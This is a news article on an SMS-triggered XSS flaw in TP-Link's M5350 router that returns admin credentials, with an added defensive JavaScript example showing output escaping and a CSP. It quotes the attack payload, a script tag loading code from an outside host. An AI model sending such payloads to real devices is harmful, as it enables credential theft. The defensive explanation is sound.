TP-Link 3G/Wi-Fi modem spills credentials to an evil text message

So why can it read scripts sent by SMS anyhow?

Facepalm

TP-Link's M5350 3G/Wi-Fi router has the kind of howling bug that gives infosec pros nightmares.

In what looks like a feature created for developers' convenience, but left behind when it should have been deleted, the device's admin credentials can be retrieved by text message.

The discoverer of the bug, a German company called Securai, described the issue to Heise.de as a cross-site scripting (XSS) bug triggered by an SMS containing the following attack script:

<script src=//n.ms/a.js></script>

The device replies with admin username, admin password, its SSID, and its login password.
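The class of bug described above, shown as an added example that is not TP-Link's firmware code or Securai's: it assumes an admin web page that builds its SMS inbox as an HTML string, and contrasts raw concatenation with output encoding. The function names, the sample inbox and the CSP value are all constructed for illustration.

```javascript
// Constructed sample inbox; the second body is the string quoted in the article.
const inbox = [
  { from: "+491700000000", body: "Your data bundle expires tomorrow." },
  { from: "Promo<b>", body: "<script src=//n.ms/a.js></script>" },
];

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode every character that can open a tag, an entity or an attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: sender and message text go into the markup untouched,
// so a <script> element in an SMS becomes part of the admin page.
function renderInboxUnsafe(messages) {
  return messages
    .map((m) => `<li><b>${m.from}</b>: ${m.body}</li>`)
    .join("\n");
}

// Hardened pattern: both attacker-controlled fields are encoded on output
// (SMS sender IDs can be alphanumeric, so they are untrusted too).
function renderInboxSafe(messages) {
  return messages
    .map((m) => `<li><b>${escapeHtml(m.from)}</b>: ${escapeHtml(m.body)}</li>`)
    .join("\n");
}

// Defence in depth (assumed policy): even if encoding is missed somewhere,
// the browser refuses scripts loaded from any origin but the device itself.
const ADMIN_CSP = "default-src 'self'; script-src 'self'; object-src 'none'";

// Simple review check: does rendered output still contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("unsafe has script tag:", containsScriptTag(renderInboxUnsafe(inbox)));
console.log("safe has script tag:  ", containsScriptTag(renderInboxSafe(inbox)));
console.log("Content-Security-Policy:", ADMIN_CSP);
```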

In the Heise.de piece, Securai's Jan Hörsch said he discovered the bug by analysing the modem's firmware.

It's unlikely that the vulnerability has been patched, since according to TP-Link's current firmware download page for the M5350, the most-current version is M5350_V2_140115, released in January 2015.

Heise notes that Hörsch has also been having fun with the other usual Internet-of-Things targets – a Panasonic BM ET200 retina scanner whose web interface security could be bypassed by sending it crafted JavaScript, and a Startech modem with a hard-coded telnet password.

The bugs were revealed at last week's Kaspersky Security Analyst Summit. ®

